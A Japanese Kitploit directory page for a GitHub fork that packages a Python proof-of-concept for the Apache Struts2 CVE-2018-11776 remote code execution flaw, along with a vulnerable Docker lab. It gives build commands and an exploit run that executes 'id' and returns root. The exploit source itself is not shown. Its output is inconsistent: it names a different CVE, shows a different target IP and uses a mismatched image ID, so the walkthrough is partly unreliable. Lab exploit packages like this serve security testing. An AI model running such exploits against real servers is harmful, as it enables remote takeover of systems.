Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
ApacheStruts-CVE-2018-11776 — Apache Struts2 CVE-2018-11776 リモートコード実行脆弱性に対するPython proof-of-concept エクスプロイトです。影響を受けるバージョン2.3-2.3.34および2.5-2.5.16に対してテストするためのDockerコンテナが含まれています。 | Kitploit
ツール/GitHubGitHub/freshdemo/apachestruts-cve-2018-11776
コンテナセキュリティ脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストペイロード開発
GitHubfreshdemo/apachestruts-cve-2018-11776

ApacheStruts-CVE-2018-11776

Apache Struts2 CVE-2018-11776 リモートコード実行脆弱性に対するPython proof-of-concept エクスプロイトです。影響を受けるバージョン2.3-2.3.34および2.5-2.5.16に対してテストするためのDockerコンテナが含まれています。

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
リポジトリを見る
6年前未レビュー

Apache Struts CVE-2018-11776 Python PoC

これは https://github.com/hook-s3c/CVE-2018-11776-Python-PoC に基づいています。コンテナのビルドと指示がREADMEに記載されている通りに動作しなかったため、このフォークが作成されました。使用されているPOCエクスプロイトはRapid7からのものです。

謝辞:

hook-s3c (github.com/hook-s3c), @hook_s3c on twitter
Rapid7 https://github.com/rapid7/metasploit-framework/issues/8064

はじめに

SemmleのMan Yue Moが、リクエストのURLパスにエンコードされたペイロードによって配信されるStruts2 RCE脆弱性を開示しました。

影響を受けるバージョンは2.3〜2.3.34、および2.5〜2.5.16です。

デフォルト構成は脆弱ではありません。このコンテナや他の多くのコンテナは脆弱です。

ステップ1 - コンテナのビルド

ビルドに何が含まれているかを確認できるため、Dockerfileからコンテナをビルドすることをお勧めします。


git clone https://github.com/freshdemo/ApacheStruts-CVE-2018-11776 ./Struts
cd Struts
docker build . -t freshdemo/apachestruts

新しいコンテナを次のコマンドで確認します


docker images

出力は次のようになり、イメージIDを取得できます。


root@kitploit:~
   root@DockerHost:~/ApacheStruts-CVE-2018-11776# docker images
REPOSITORY                                 TAG                 IMAGE ID            CREATED              SIZE 
freshdemo/apachestruts latest 6586cedf49fa About a minute ago 542MB

ステップ2 - コンテナの実行

次のコマンドでコンテナをビルドして起動します。


docker run -d --name apachestruts -p 8080:8080 d39018c50afe

ステップ3 - エクスプロイト

イングレス/エグレスファイアウォールが先ほど指定したポート(8080)を許可していることを確認し、次のコマンドでターゲットに対してエクスプロイトを実行します。


python struts.py http://192.168.2.188:8080 'id'

出力は次のようになります。


root@kitploit:~
root@k:/home/s# python struts.py http://192.168.2.188:8080 'id'
[*] CVE: 2017-5638 - Apache Struts2 S2-045
http://13.88.250.188:8080 : [*] cmd: id


uid=0(root) gid=0(root) groups=0(root) 

ツールをダウンロード